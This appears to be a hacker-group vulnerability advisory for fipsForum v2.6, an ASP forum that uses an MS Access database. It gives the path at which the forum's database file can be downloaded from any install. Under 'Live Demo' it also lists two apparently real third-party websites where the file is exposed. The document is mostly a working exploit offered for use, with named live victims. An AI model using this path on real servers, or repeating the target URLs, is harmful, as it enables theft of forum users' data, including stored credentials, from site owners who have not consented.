fipsForum version 2.6 suffers from a database disclosure vulnerability.
18c9777ddbd274ff077e7ee941ac742df9fe585e709048e4016e0a5ee055f5fe
==============================================================================
__ __ __ __ __ __
/ \ / \ \ \ / / / \ / \
/ /\ \_/ /\ \ \ \ / / / /\ \_/ /\ \
/ / \ _ / \ \ \ \/ / / / \ _ / \ \
/_/ \_\ \__/ /_/ \_\
==============================================================================
[»] ~ Note : [ Tribute to the martyrs of Gaza . ]
==============================================================================
[»] fipsForum v2.6 Remote Database Disclosure Vulnerability
==============================================================================
[»] Script: [ fipsForum ]
[»] Language: [ ASP ]
[»] Site page: [ fipsForum is a simple and easy to use Forum System with a MS Access database. ]
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
###########################################################################
===[ Exploit ]===
[»] http://[target].com/[path]/_database/forumFips.mdb
===[ Live Demo ]===
[»] http://www.sprq.ca/CGI-BIN/fipsforum3652/_database/forumFips.mdb
[»] http://fido.suriweb.net/pag/zoo/_database/forumFips.mdb
Author: ViRuSMaN <-
###########################################################################
________________________________
Hotmail: Powerful Free email with security by Microsoft. Get it now.<https://signup.live.com/signup.aspx?id=60969>